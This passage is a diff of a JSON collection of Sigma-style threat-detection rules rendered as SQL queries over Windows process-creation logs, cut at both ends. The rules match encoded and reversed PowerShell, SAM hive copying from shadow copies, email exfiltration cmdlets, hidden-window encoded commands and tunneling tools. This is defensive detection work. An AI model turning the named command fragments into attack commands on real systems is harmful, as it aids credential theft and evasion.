'%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_appx_execution.yml" + "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" }, { - "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", - "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", - "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", + "title": "Execute Code with Pester.bat as Parent", + "id": "18988e1b-9087-4f8a-82fe-0414dce49878", + "status": "experimental", + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "author": "frack113, Nasreddine Bencherchali", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1036.003", - "car.2013-05-009" + "attack.t1216" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%\\\\WindowsPowerShell\\\\Modules\\\\Pester\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%{ Invoke-Pester -EnableExit ;%' ESCAPE '\\' OR ParentCommandLine LIKE '%{ Get-Help \"%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" + "filename": "proc_creation_win_lolbin_pester.yml" }, { - "title": "Explorer NOUACCHECK Flag", - "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", + "title": "Execution in Webserver Root Folder", + "id": "35efb964-e6a5-47ad-bbcd-19661854018d", "status": "test", - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" + "Various applications", + "Tools that include ping or nslookup command invocations" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wwwroot\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmpub\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\htdocs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tools\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SMSComponent\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_nouaccheck.yml" + "filename": "proc_creation_win_susp_execution_path_webserver.yml" }, { - "title": "New Process Created Via Wmic.EXE", - "id": "526be59f-a573-4eea-b5f7-f0973207634d", + "title": "Potential PowerShell Obfuscation Via Reversed Commands", + "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", "status": "test", - "description": "Detects new process creation using WMIC via the \"process call create\" flag", - "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", + "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_process_creation.yml" + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" }, { - "title": "Winrar Compressing Dump Files", - "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "title": "Email Exifiltration Via Powershell", + "id": "312d0384-401c-4b8b-abdf-685ffba9a332", "status": "experimental", - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects email exfiltration via powershell cmdlets", + "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.exfiltration" ], "falsepositives": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrar_dmp.yml" + "filename": "proc_creation_win_powershell_email_exfil.yml" }, { - "title": "Remote Access Tool - AnyDesk Silent Installation", - "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "title": "Network Reconnaissance Activity", + "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", "status": "test", - "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", - "author": "Ján Trenčanský", + "description": "Detects a set of suspicious network related commands often used in recon stages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate deployment of AnyDesk" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" + "filename": "proc_creation_win_nslookup_domain_discovery.yml" }, { - "title": "Always Install Elevated MSI Spawned Cmd And Powershell", - "id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", + "title": "MSExchange Transport Agent Installation", + "id": "83809e84-4475-4b69-bc3e-4aad8568612f", "status": "test", - "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "description": "Detects the Installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%msi%' ESCAPE '\\' AND ParentProcessName LIKE '%tmp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml" + "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml" }, { - "title": "Replace.exe Usage", - "id": "9292293b-8496-4715-9db6-37028dcda4b3", - "status": "experimental", - "description": "Detects the use of Replace.exe which can be used to replace file with another file", - "author": "frack113", + "title": "Suspicious Cabinet File Expansion", + "id": "9f107a84-532c-41af-b005-8d12a607639f", + "status": "test", + "description": "Adversaries can use the built-in expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\replace.exe' ESCAPE '\\' AND (CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\expand.exe' ESCAPE '\\' AND (CommandLine LIKE '%.cab%' ESCAPE '\\' OR CommandLine LIKE '%/F:%' ESCAPE '\\' OR CommandLine LIKE '%-F:%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_replace.yml" + "filename": "proc_creation_win_expand_cabinet_files.yml" }, { - "title": "Cmd.EXE Missing Space Characters Execution Anomaly", - "id": "a16980c2-0c56-4de0-9a79-17971979efdd", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service", + "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "status": "experimental", - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" - ], - "filename": "proc_creation_win_cmd_no_space_execution.yml" - }, - { - "title": "PowerShell SAM Copy", - "id": "1af57a4b-460a-4738-9034-db68b880c665", - "status": "test", - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + "Rare intended use of hidden services" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_sam_access.yml" + "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" }, { - "title": "Powershell ChromeLoader Browser Hijacker", - "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "title": "PUA - NPS Tunneling Tool Execution", + "id": "68d37776-61db-42f5-bf54-27e87072d17e", "status": "experimental", - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "author": "Aedan Russell, frack113 (sigma)", + "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1176" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" + "attack.command_and_control", + "attack.t1090" ], - "filename": "proc_creation_win_browsers_chrome_load_extension.yml" - }, - { - "title": "Suspicious Sysmon as Execution Parent", - "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", - "status": "experimental", - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", - "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" ], - "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" + "filename": "proc_creation_win_pua_nps.yml" }, { - "title": "PUA - CsExec Execution", - "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "title": "Suspicious PowerShell Invocations - Specific - ProcessCreation", + "id": "536e2947-3729-478c-9903-745aaffe60d2", "status": "experimental", - "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-noni%' ESCAPE '\\' AND CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE 